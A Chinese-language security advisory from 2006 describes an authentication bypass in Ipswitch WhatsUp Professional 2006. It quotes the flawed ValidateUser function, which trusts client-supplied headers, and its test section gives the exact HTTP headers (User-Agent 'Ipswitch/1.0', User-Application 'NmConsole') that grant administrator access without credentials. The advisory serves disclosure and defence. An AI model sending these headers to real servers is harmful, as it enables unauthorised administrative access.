首页 -> 安全研究
安全研究
安全漏洞
Ipswitch WhatsUp Professional 2006认证绕过漏洞
发布日期:2006-05-17
更新日期:2006-05-17
受影响系统:
Ipswitch WhatsUp Professional 2006描述:
BUGTRAQ ID: 18019
Whatsup Professional软件是Ipswitch公司开发的监视TCP/IP、NetBEUI和IPX网络状态的工具。
What's Up Professional 2006存在绕过认证漏洞,攻击者就可以绕过认证机制无需凭据便可登录。
攻击者可以通过发送有特制首部的HTTP请求诱骗应用程序相信请求来自控制台,而控制台是可信任的。
--------------------------------
有漏洞函数的位置:
--------------------------------
NmConsole\StandardIncludes\ApplicationContext.inc
--------------------
有漏洞函数:
--------------------
/*****************************************************
* USER FUNCTIONS
**/
ApplicationContext.prototype.ValidateUser = function()
{
var sScriptName = Request.ServerVariables("SCRIPT_NAME") + "";
if(this.DoesExist(this.nWebUserID)
|| sScriptName.indexOf("Login.asp") > -1
) return true;
if((Request.ServerVariables("HTTP_User-Application") == "WebArchive"
|| Request.ServerVariables("HTTP_User-Application") == "NmConsole")
&& Request.ServerVariables("HTTP_User-Agent") == "Ipswitch/1.0"
)
{
nUserRightsMask = this.GetUserRightBit("Access Group and Device Reports");
nUserRightsMask += this.GetUserRightBit("Access System Reports");
if(Request.ServerVariables("HTTP_User-Application") == "NmConsole")
{
nUserRightsMask += this.GetUserRightBit("Manage Devices");
this.bInConsole = true;
Session("bInConsole") = true;
}
//
//If you are coming from the Console/RR Reports, you should be able to access everything.
//
this.SetUser( this.ADMIN_USER_ID , "NmConsole", nUserRightsMask, 0);
return true;
}
sRedirectURL = Request.ServerVariables("SCRIPT_NAME") + "?" + Request.QueryString;
if(!this.DoesExist(Session("sRedirectURL")) || Session("sRedirectURL") == "")
{
if(sRedirectURL.indexOf("RestrictedAccess") == -1)
Session("sRedirectURL") = sRedirectURL;
}
if(Response.Buffer == false)
Response.Buffer = true;
Response.Redirect("/NmConsole/Login.asp");
Response.End();
};
<*来源:Kenneth F. Belva (ken@ftusecurity.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=114789105503836&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Host: [server]
User-Agent: Ipswitch/1.0
User-Application: NmConsole
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://[server]/
建议:
厂商补丁:
Ipswitch
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.ipswitch.com/
浏览次数:3460
严重程度:0(网友投票)
绿盟科技给您安全的保障